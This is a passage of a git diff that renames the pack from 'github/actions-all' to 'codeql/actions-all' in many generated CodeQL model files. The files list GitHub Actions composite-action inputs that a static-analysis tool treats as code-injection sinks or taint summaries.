b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml index a6222605575..4bac281500b 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/arrow", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml index 07c4cc427c1..3ee27175205 100644 --- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml index 77adcd6151d..37c2873b508 100644 --- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/brpc", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml index fe453b3086d..231df2a7f87 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml index 6d5296ba6d1..94ba6559838 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml index 14600fdc23e..ab91a71fc0e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml index a67988b08aa..b704cc54b82 100644 --- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml index 663702e6418..b438360b5a6 100644 --- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml index de7a728d096..05b822ebc4d 100644 --- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/opendal", "*", "input.feature", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml index 360eb948595..de7c35fa111 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/pekko", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml index 290712830e2..4ef3ce32bfe 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml index d58063c2452..0efe533073b 100644 --- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml index 784627c32ab..a472b1be979 100644 --- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml +++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml index b4f5866b86d..409c3907786 100644 --- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml index 77a7407adfb..29a0e582ec7 100644 --- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml index a97bce1de7a..5d88aaf0017 100644 --- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml index 5bf814bcc69..fe2fb29bfa8 100644 --- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml index 6a141053bbe..7107b1dd55d 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml index 4fec81ed178..7ecc0cb0e61 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml index 1290646ef6d..c75ff3a6914 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml index 60a023c9730..ed5dae96060 100644 --- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml index 1a99c3773de..a638ceae55c 100644 --- a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml index e3cf5db0f15..eb67c35e5f5 100644 --- a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml index 67866c4f904..abfb5157d3b 100644 --- a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml index 2317aa06ae2..f0c79816026 100644 --- a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml index baf9c55ff18..5618781b68d 100644 --- a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml index 583be58ecd2..b1a2d8e4c36 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml index e8250232853..f9b39981ab8 100644 
--- a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml index d3172c56667..1c90c92ca21 100644 --- a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml index 7c1f9dac6bb..25f194e823a 100644 --- a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml index c77798c1022..2f1481c9c55 100644 --- a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml index 3035324bee0..67a1836e826 100644 --- a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml index dd208976fc5..917bd6b0307 100644 --- a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml index 63f111f3e83..98190bffee4 100644 --- a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml index c330ca64c08..4916ce713d7 100644 --- a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml index 6b67c69e6e3..e015387a96d 100644 --- a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml index 135bb4baa8b..b9c1ff99ab3 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml index c201386cf93..e8cde1a082f 100644 
--- a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml index 5e39d3f6c5f..1f5bd390369 100644 --- a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml index 9a9f865b0db..2097e02a48a 100644 --- a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml index 5c877a87d68..131b59e4f42 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml index 6e9e8363290..2b6604f4bce 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml index f0e62cdaec1..028fac59db9 100644 --- a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml index b1158922636..e188c7fb160 100644 --- a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml index 78c1a396056..fe09708380b 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml index 75c257f39ae..430d128f1a0 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml index 4d19b3ec0af..ecfd41e15dc 100644 --- a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml index b8bdc7276fb..b334b14eb37 100644 --- a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml index 220dbb58e02..936a44a214b 100644 --- a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml index 1992cbf4696..c116f45a7df 100644 --- a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml index 02c01196842..f8438e902c6 100644 --- a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml index 50af2e33e16..dc392c76263 100644 --- a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml index 679b362ba3f..0e7876a64fe 100644 --- a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml index 8e11db68c85..ccad63033af 100644 --- a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] 
